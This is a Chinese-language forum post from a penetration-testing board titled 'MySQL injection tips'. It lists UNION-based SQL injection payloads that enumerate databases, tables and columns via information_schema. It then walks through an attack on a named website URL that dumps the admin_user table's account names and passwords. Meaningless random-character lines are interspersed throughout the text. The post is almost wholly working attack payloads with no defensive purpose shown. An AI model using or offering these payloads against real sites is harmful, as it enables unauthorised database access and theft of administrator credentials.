中国网络渗透测试联盟
标题:
mysql注入技巧
[打印本页]
作者:
admin
时间:
2012-9-13 16:29
标题:
mysql注入技巧
查库
0 f& n8 ], I/ I4 Q( c
; Z t4 s& B+ G/ m4 n5 l$ t0 a% v) K
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
3 D* V: ~% B' f4 p
5 m3 d; x( y2 d
查表
m7 X8 O3 w9 f5 y
; J+ _8 P; E" @) g' w
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
$ {2 F _0 Y( D; \5 Y5 Z2 T9 y
* P; u8 e/ Q1 s% T- g+ e/ D) h0 _
查段
# f8 N1 ^ `4 A3 j" _4 _* h
8 |$ M# n7 a. ]0 q0 U: K6 O. F
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
' K; X5 E& d+ N+ }1 Q" Q# I: E$ t: u, x
V$ ~) c- O1 f* d3 k
" i4 \, E/ C/ D/ d: [
mysql5高级注入方法暴表
! Q! V2 S* w* f/ k+ a% g
/ t" L) e6 c4 k6 `9 c& W0 T
例子如下:
' M4 p% w8 k w
' E/ l5 U1 B" D4 w' E
1.爆表
& q3 }4 {5 D1 f- ?' {
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
; `; R. \- s D, W4 ]) Y# ^
这样爆到第4个时出现了admin_user表。
# Y9 u& L$ `& ~$ _$ c5 D
7 l" Q- R( y5 K: [
2.暴字段
5 h) e5 Y0 Q# R% q4 [- g4 q
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
" k# n( o* ]7 W. w
: v/ H+ D* b9 ^3 z0 `0 \4 F
& @" y: t: n7 y
3.爆密码
3 I" k! z' |: ^) n& N
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
2 K% Z0 T# k: D3 x4 A
% ?* M% h8 U# z
( Q; m* _( B) x7 _! |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2